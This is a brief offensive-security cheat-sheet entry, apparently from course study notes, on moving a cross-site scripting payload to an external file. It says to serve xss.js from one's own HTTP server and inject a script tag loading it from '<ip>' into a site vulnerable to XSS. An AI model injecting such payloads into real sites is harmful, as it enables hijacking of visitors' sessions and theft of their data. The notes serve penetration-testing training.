XSS external JS payload¶
- Run http server and create xss.js file with payload 2023042721114747 Create FS http server
- Create link to your external script and inject it in vulnerable to XSS site:
<script src="http://<ip>/xss.js"></script>
References¶
- web200.Cross-Site Scripting Exploitation and Case Study.Moving the Payload to an External Resource